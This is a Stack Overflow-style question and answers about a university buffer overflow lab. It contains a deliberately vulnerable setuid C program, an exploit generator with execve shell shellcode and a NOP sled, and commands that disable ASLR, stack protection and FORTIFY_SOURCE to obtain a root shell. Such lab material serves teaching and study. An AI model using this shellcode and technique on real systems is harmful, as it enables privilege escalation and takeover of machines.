# Buffer Overflow Vulnerability Lab problems

Tags: c, security, buffer-overflow, fortify-source

I have a lab assignment that I am stuck on.  Basically, I have to take advantage of a buffer overflow to generate a shell that has root privileges.  I have to use 2 separate .c files.  Here is the first one:
stack.c

```
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
int bof(char *str)
{
    char buffer[12];

    //BO Vulnerability
    strcpy(buffer,str);

    return 1;
}

int main(int argc, char* argv[])
{
    char str[517];

    FILE *badfile;
    badfile = fopen("badfile","r");

    fread(str, sizeof(char),517, badfile);
    bof(str);

    printf("Returned Properly\n");
    return 1;
}
```

Here is the second one:
exploit.c

```
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
char shellcode[]=
"\x31\xc0"              /* xorl    %eax,%eax              */
"\x50"                  /* pushl   %eax                   */
"\x68""//sh"            /* pushl   $0x68732f2f            */
"\x68""/bin"            /* pushl   $0x6e69622f            */
"\x89\xe3"              /* movl    %esp,%ebx              */
"\x50"                  /* pushl   %eax                   */
"\x53"                  /* pushl   %ebx                   */
"\x89\xe1"              /* movl    %esp,%ecx              */
"\x99"                  /* cdql                           */
"\xb0\x0b"              /* movb    $0x0b,%al              */    
"\xcd\x80"              /* int     $0x80                  */
;
void main(int argc, char **argv)
{
    char buffer[517];
    FILE *badfile;
    /* Initialize buffer with 0x90 (NOP instruction) */
    memset(&buffer, 0x90, 517);
/* You need to fill the buffer with appropriate contents here */
/* Save the contents to the file "badfile" */
    badfile = fopen("./badfile", "w");
    fwrite(buffer, 517, 1, badfile);
    fclose(badfile);
}
```

I can only modify the second one.  Here are the changes I have made:

```
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define DEFAULT_OFFSET 350 

char shellcode[]=
"\x31\xc0"              /* xorl    %eax,%eax              */
"\x50"                  /* pushl   %eax                   */
"\x68""//sh"            /* pushl   $0x68732f2f            */
"\x68""/bin"            /* pushl   $0x6e69622f            */
"\x89\xe3"              /* movl    %esp,%ebx              */
"\x50"                  /* pushl   %eax                   */
"\x53"                  /* pushl   %ebx                   */
"\x89\xe1"              /* movl    %esp,%ecx              */
"\x99"                  /* cdql                           */
"\xb0\x0b"              /* movb    $0x0b,%al              */    
"\xcd\x80"              /* int     $0x80                  */

unsigned long get_sp(void)
{
    __asm__("movl %esp,%eax");
}

void main(int argc, char **argv)
{
    char buffer[517];
    FILE *badfile;
    char *ptr;
    long *a_ptr,ret;

    int offset = DEFAULT_OFFSET;
    int codeSize = sizeof(shellcode);
    int buffSize = sizeof(buffer);

    if(argc > 1) offset = atoi(argv[1]); //allows for command line input

    ptr=buffer;
    a_ptr = (long *) ptr;

    /* Initialize buffer with 0x90 (NOP instruction) */
    memset(buffer, 0x90, buffSize);

//----------------------BEGIN FILL BUFFER----------------------\\

    ret = get_sp()+offset;
    printf("Return Address: 0x%x\n",get_sp());
    printf("Address: 0x%x\n",ret);

    ptr = buffer;
    a_ptr = (long *) ptr;

    int i;
    for (i = 0; i < 300;i+=4)
    {
        *(a_ptr++) = ret;
    }

    for(i = 486;i < codeSize + 486;++i)
    {
        buffer[i] = shellcode[i-486];
    {
    buffer[buffSize - 1] = '\0';
//-----------------------END FILL BUFFER-----------------------\\


/* Save the contents to the file "badfile" */
    badfile = fopen("./badfile", "w");
    fwrite(buffer,517,1,badfile);
    fclose(badfile);    
}
```

I then executed the following from command line

```
$ su root
$ Password (enter root password)
# gcc -o stack -fno-stack-protector stack.c
# chmod 4755 stack
# exit
$ gcc -o exploit exploit.c
$./exploit
$./stack
```

However, while it does generate a "badfile" with actual data and a shell, said shell only has basic user privileges.  Beforehand, I did execute the following in root:

```
echo 0 > /proc/sys/kernel/randomize_va_space
```

The Lab says I instead need to execute the following in root:

```
sysctl -w kernel.randomize_va_space=0
```

However, if I do that, then when I execute "stack", I get an "illegal instruction" error.  Can someone help me out with this one?

Comment: Have you checked that the compiled stack file is owned by root?

Comment: http://stackoverflow.com/q/14903394/905902 Exact duplicate (including the silly void main() ...)

Answer (score 2):

I figured out what the problem was.  I had to link the zsh to /bin/bash/.  I skipped that because I thought I only had to do that if I was using Fedora.  I was using Ubuntu.

Comment: I know this is old but if you are still around, can you explain what  __asm__("movl %esp,%eax"); does and how does it always work?

Answer (score 0):

> ```
>  strcpy(buffer, str);
> ```

One of the things you will need to address during testing is this function call.

FORTIFY_SOURCE uses "safer" variants of high risk functions like `memcpy` and `strcpy`. The compiler uses the safer variants when it can deduce the destination buffer size. If the copy would exceed the destination buffer size, then the program calls `abort()`.

To disable FORTIFY_SOURCE for your testing, you should compile the program with `-U_FORTIFY_SOURCE` or `-D_FORTIFY_SOURCE=0`.